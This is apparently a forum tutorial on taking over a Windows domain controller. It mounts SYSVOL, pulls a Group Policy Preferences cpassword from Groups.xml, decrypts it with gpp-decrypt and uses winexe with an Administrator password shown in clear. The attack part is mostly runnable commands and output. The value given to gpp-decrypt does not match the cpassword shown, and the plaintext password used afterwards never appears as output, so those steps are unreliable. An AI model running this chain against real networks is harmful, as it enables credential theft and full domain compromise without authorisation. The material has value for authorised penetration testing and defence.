Let's consider the following assumptions:

1) Somehow I gained access to a Windows system which is joined to the domain.
2) I am maintaining a low-privileged user shell on that system.

Tools we used while performing the Domain Controller pentest:

1) GPP-Decrypt - For decrypting the GPP policy password
2) WinExe - For gaining shell access to the domain controller as Administrator

Let's consider that I got limited shell access to the Windows system by exploiting vulnerable software, a web application vulnerability or a client-side attack. I started recon on the system using my limited shell. The very first command I executed:
Code:
echo %LOGONSERVER%
Using this command, I found out which domain controller this system authenticated against.

The domain controller was:
Code:
\\G4HBABA
So we know the domain controller name; what next? Let's try to find the SYSVOL directory.

For those who don't know about SYSVOL:

Code:
The term SYSVOL refers to a set of files and folders that reside on the local hard disk of each domain controller in a domain and that are replicated by the File Replication service (FRS). Network clients access the contents of the SYSVOL tree by using the NETLOGON and SYSVOL shared folders.
Just mount the domain controller's SYSVOL share using the following command:

Code:
net use z: \\G4HBABA\SYSVOL
The next step is to find Groups.xml, where the password pushed out by the DC is stored.

Code:
z:
z:\>dir /s *.xml
Once you have located the XML file, you can just copy it to the desktop:

Code:
z:> Copy Groups.xml c:\Users\garage\Desktop\Groups.xml 
z:>c:
To view the XML file, use the following command:
Code:
c:\Users\garage\Desktop>type Groups.xml
Code:
<?xml version="1.0" encoding="utf-8"?>
  <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
    <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
     name="ladmin_gpo" image="0" changed="2012-02-03 07:10:48"
     uid="{FE47E73C-7525-46CD-B2E0-F68D3022EDCE}">
      <Properties action="C" fullName="Local admin created by GPO"
       description=""
       cpassword="9QHhFTUdm6rDgu30J7ShZfqt07T6vOUGkyAFG3G7M+5AotJjkOva7E9KSAcamdrruTgly0O/uVTB/UUdLNU4775b5381hyuUzkd4lJW+llcNNNrQlYu7zqH3/i+8jfjhUq9lqPn8VjCtb9iaEqWbKQ"
       changeLogon="0" noChange="0" neverExpires="0"
       acctDisabled="0" userName="ladmin_gpo"/>
    </User>
    <Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}"
     name="Administrators (built-in)" image="2"
     changed="2012-02-06 10:45:50"
     uid="{4D0CE71D-D2E4-42B1-9BF3-147C910A15F1}">
    </Group>
  </Groups>
As you can see, the encrypted password is in the XML, in the cpassword attribute. To decrypt it, you can use the utility called gpp-decrypt:

Code:
>gpp-decrypt 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
Alright, let's try to connect to the DC.

Code:
 >winexe -U HOME/Administrator%h4ppyxm455!! //IPHOST "cmd"
Once you execute the above command, your existing privileges will be elevated to those of the Administrator account on the DC.